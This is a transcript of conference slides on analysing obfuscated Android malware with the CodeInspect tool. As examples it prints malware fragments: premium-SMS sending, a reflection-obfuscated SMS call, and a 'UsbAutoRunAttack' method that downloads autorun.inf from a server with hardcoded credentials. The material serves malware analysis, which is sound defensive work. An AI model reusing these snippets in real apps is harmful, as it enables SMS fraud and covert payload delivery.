Analyzing Sophisticated Android Malware with CodeInspect · Analyzing Sophisticated Android Malware...

Post on 05-Jun-2020

8 views 1 download

Preview:

Click to see full reader
Report this document
SHARE

Transcript of Analyzing Sophisticated Android Malware with CodeInspect · Analyzing Sophisticated Android Malware...

SOFTWARE ENGINEERINGGROUP

SECURE

Analyzing Sophisticated Android Malware with CodeInspect

Siegfried Rasthofer

SOFTWARE ENGINEERINGGROUP

SECURE

#whoami

2

• 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr. Eric Bodden)• Research interest:

• Applied software security on Android• Static-/dynamic code analyses

• Android Security:• Found 2 AOSP exploits• Korea Threat investigation together with McAfee Research Lab Intel Security

SOFTWARE ENGINEERINGGROUP

SECURE 3

Malware

SOFTWARE ENGINEERINGGROUP

SECURE 4

public void onCreate(android.os.Bundle $param0){ sendTextMessage("3353", null, "798657", null, null); sendTextMessage("3354", null, "798657", null, null); sendTextMessage("3353", null, "798657", null, null);}

public static boolean gdadbjrj(String paramString1 , String paramString2)

{

Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), new Class[0]).invoke(null, new Object[0]); String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; clz.getMethod(s, arr).invoke(localObject , new Object [] { paramString1 , null , paramString2 , null , null });

}

SOFTWARE ENGINEERINGGROUP

SECURE 5

public static boolean gdadbjrj(String paramString1 , String paramString2)

{

Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), new Class[0]).invoke(null, new Object[0]); String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; clz.getMethod(s, arr).invoke(localObject , new Object [] { paramString1 , null , paramString2 , null , null });

}

- Reflections- Packers- Anti-Decompile- Anti-Debug- …

SOFTWARE ENGINEERINGGROUP

SECURE

A new Binary Analysis Framework for Android and Java Bytecode

6

SOFTWARE ENGINEERINGGROUP

SECURE 7

Soot

SOFTWARE ENGINEERINGGROUP

SECURE 8

Soot

Input/Output

.dex .java .jimple .apk.class

- Various callgraph algorithms- Sophisticated algorithms used in compiler

construction- Code manipulation

Soot

https://github.com/Sable/soot/wiki

https://github.com/Sable/soot/wiki

SOFTWARE ENGINEERINGGROUP

SECURE 9

Soot

Jimple

SOFTWARE ENGINEERINGGROUP

SECURE 10

public static boolean UsbAutoRunAttack(android.content.Context $param0){ java.lang.String $String;

$String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); return true; }

Declarations

Code

Return-Statement

Jimple Soot

SOFTWARE ENGINEERINGGROUP

SECURE 11

Soot

Jimple

CodeInspect

SOFTWARE ENGINEERINGGROUP

SECURE 12

CodeInspect

Jimple Code

Readable Files

Code Refactoring

Debugger

Java SourceEnhancement

Syntax Highlighting

Code Manipulation

Dataflow Visualizer

Deobfuscator “Region“ Detection

Jimple Soot

SOFTWARE ENGINEERINGGROUP

SECURE

Let’s get started…

13

1. Import APK

2. Start Device

SOFTWARE ENGINEERINGGROUP

SECURE 14

Banking Trojan

Activation Component

SMS

HTTP

E-Mail

Intercept SMS Intercept Call

Install Fake AV Uninstall AV

File SystemNative Code

User

Waiting Time

Send SMS

App Internal External EventEnvironment Settings

An Investigation of the Android/BadAccents Malware which Exploits a new Android Tapjacking AttackSiegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden

Android/BadAccents

SOFTWARE ENGINEERINGGROUP

SECURE

Live-Demo

15

https://goo.gl/LblcR5

https://goo.gl/LblcR5

SOFTWARE ENGINEERINGGROUP

SECURE

Future Steps

16

• New Plugins under development

• Easily add own analyses

• What would be a useful feature for you?

SOFTWARE ENGINEERINGGROUP

SECURE

How do I get this tool?

17

SOFTWARE ENGINEERINGGROUP

SECURE 18

SOFTWARE ENGINEERINGGROUP

SECURE

Siegfried Rasthofer Secure Software Engineering GroupEmail: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.deTwitter: @CodeInspect

19

mailto:siegfried.rasthofer@cased.de
http://sse-blog.ec-spride.de/
http://sse.ec-spride.de

Top related

PIN-point control for analyzing malware - RECON.CXPIN-point control for analyzing malware!!!! Jason Jones REcon 2014 1. Me Sr Sec Research Analyst @ Arbor ... NOT an in-depth intro
 Documents
ì Software Reverse Engineering...Life as a Malware Analyst ìAt a minimum, they want to obfuscate their malware to avoid automated detection ìAnd they really don’t like you analyzing
 Documents
Creating, obfuscating and analyzing malware JavaScript
 Technology
Transparent System Introspection in Support of Analyzing ...web.eecs.umich.edu › ~weimerw › students › kleach-proposal-slides.p… · Support of Analyzing Stealthy Malware Kevin
 Documents
Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Shouhuai Xu CS @ UTSA Ravi Sandhu ICS @ UTSA Jose A. Morales SEI @ CMU.
 Documents
Machine Learning for Analyzing Malware
 Documents
Identifying and Analyzing Pointer Misuses for …trj1/cse597-s13/docs/pointer_misuse...Identifying and Analyzing Pointer Misuses for Sophisticated Memory-corruption Exploit Diagnosis
 Documents
Maritime Systems Security... · • On zombie (compromised) computers • Sophisticated, advanced, persistent malware • Run software autonomously and automatically • Botnet controller
 Documents
Analyzing and Detecting Emerging Internet of Things ...alasmary/docs/JIOT2925929.pdf · 1 Analyzing and Detecting Emerging Internet of Things Malware: A Graph-based Approach Hisham
 Documents
Cyberoam Next-Generation Security for Enterprises : Brochure · 2019-11-23 · leakage over websites and applications, sophisticated & blended attacks, malware, spam, spyware and
 Documents
Malware Nilgün Kablan. Malware …………………………………….…….……………………………………………… Geschichte der Malware ……………….…………………………………………………
 Documents
A sophisticated Malware Arpit Singh CPSC 420 arpits@clemson.edu.
 Documents
Remote Control Interloper: Analyzing New Chinese … · 3 Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN Introduction On November 8, 2016 a
 Documents
Analyzing Recent Evolutions in Malware Loaders
 Documents
Measuring and Analyzing Service Levels: A Scalable … · Measuring and Analyzing Service Levels: A Scalable Passive Approach 3 for each individual user by sophisticated scheduling,
 Documents
Analyzing Malware Detection Effectiveness with Multiple Anti-Malware Programs
 Documents
Memory Forensics: Collecting & Analyzing Malware Artifacts ...issa-dc.org/presentations/03152011_eroraha_memory_forensics.pdfRegistry hivescan hivelist printkey hivedump hashdump lsadump
 Documents
Memory Forensics: Collecting & Analyzing Malware Artifacts from … · 2016. 10. 23. · Memory Forensics: Collecting and Analyzing Malware Artifacts from RAM . Volatility Modules
 Documents
Let your CSIRT do malware analysis, Recruit-CSIRT has … · Let your CSIRT do malware analysis, ... Self-introduction ... Advantages -「Capable of analyzing huge malware 」 •
 Documents
Analyzing MSOffice Malware With OfficeMalScanner
 Documents

Copyright © 2022 FDOCUMENTS